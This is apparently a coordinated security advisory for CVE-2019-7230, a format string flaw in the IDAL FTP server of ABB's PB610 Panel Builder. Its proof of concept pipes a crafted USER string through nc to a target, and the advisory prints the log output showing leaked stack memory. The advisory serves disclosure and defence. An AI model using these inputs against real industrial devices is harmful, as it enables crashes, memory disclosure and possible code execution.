ABB IDAL FTP Server Uncontrolled Format String Vulnerability

17 June 2019

 

IDENTIFIERS   

 

 

CVE-2019-7230

ABBVU-IAMF-1902008

 

CVSS SCORE

 

8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

 

XID

 

XL-19-004

 

AFFECTED VENDORS

 

ABB (new.abb.com)

 

CREDIT

 

Eldar Marcussen - xen1thLabs - Software Labs

 

VULNERABILITY SUMMARY       

 

 

The IDAL FTP server is vulnerable to memory corruption through insecure use of user supplied format strings. An attacker can abuse this functionality to bypass authentication or execute code on the server.

 

TECHNICAL DETAILS   

 

 

The IDAL FTP server does not safely handle username strings during the authentication process. Attempting to authenticate with the username “%s%p%x%d” will crash the server. Sending “%08x.AAAA.%08x.%08x” will log memory content from the stack.

 

 PROOF OF CONCEPT

$ perl –e 'print "USER %08x.AAAA.%08x.%08x\r\nPASS xen1thLabs\r\n";' | nc targetip 22

   

UserManagementModule::isUserExist failed. “72657355.AAAA.616e614d.656d6567” not present in UserFactory

UserManagementModule::LoginFTPUser failed. User :“72657355.AAAA.616e614d.656d6567” not present in UserFactory

FTP logging stack values.

 

AFFECTED SYSTEMS 

  

PB610 Panel Builder 600, order code: 1SAP500900R0101, versions 1.91 … 2.8.0.367

 

SOLUTION 

 

 

 

 

Apply the patches and instructions from vendor:

- ABB PB610:

 

DISCLOSURE TIMELINE

 

 

 

04/02/2019 - Contacted ABB requesting disclosure coordination

05/02/2019 - Provided vulnerability details

05/06/2019 – Patch available

17/06/2019 – xen1thLabs public disclosure